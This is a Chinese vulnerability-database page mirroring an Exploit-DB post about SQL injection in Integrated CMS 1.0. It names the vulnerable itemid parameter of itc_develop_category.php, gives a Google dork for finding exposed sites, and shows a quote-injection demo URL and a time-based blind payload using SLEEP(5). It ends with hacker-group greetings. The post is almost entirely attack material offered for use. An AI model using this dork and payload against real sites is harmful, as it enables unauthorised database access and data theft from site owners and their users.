Integrated CMS 1.0 - SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1065122 漏洞类型
发布时间 2013-08-12 更新时间 2013-08-12
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/27525
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
==========================================================================================================
[/]#~Exploit Title : Integrated CMS Saudi SQL Injection
[\]
[/]#~Exploit Author : DSST
[\]
[/]#~Vendor Home Page : in2sol.com
[\]
[/]#~Tested on: Windows 7,GNU/Linux,Windows XP,Windows 8
[\]
[/]#~Google Dork: inurl:itc_develop_category.php?itemid=
[\]
[/]#~Version : 1
[\]
==========================================================================================================
[/]@~Location : /itc_develop_category.php?itemid=[SQL]
[\]
[/]@~Demo 1:http://server/itc_develop_category.php?itemid=10%27
[\]
[\]
[\]@~Exploit-DB Note:
   Type: AND/OR time-based blind
   Title: MySQL > 5.0.11 AND time-based blind
   Payload: itemid=1 AND SLEEP(5)
==========================================================================================================
[/] D!sc0v3r3d by : Mr.Killer , Mr.EpSiLoN
[\]
[/] Greetz: |SILENT -SAJJAD13AND11-CRACK3R-HELL BOY-MR.BAD_JENS
[\]
[/] MEDRIK-HOTON -JJHACKER - GAME OVER !- IRIST-MR.HESAAM-Bl4ck C0d3R
[\]
[/] Explo!ter-Omid.Hacker-_Ali_-Beni_Vanda-D4?Kness 0w1-And All MemberR -|
[\]
==========================================================================================================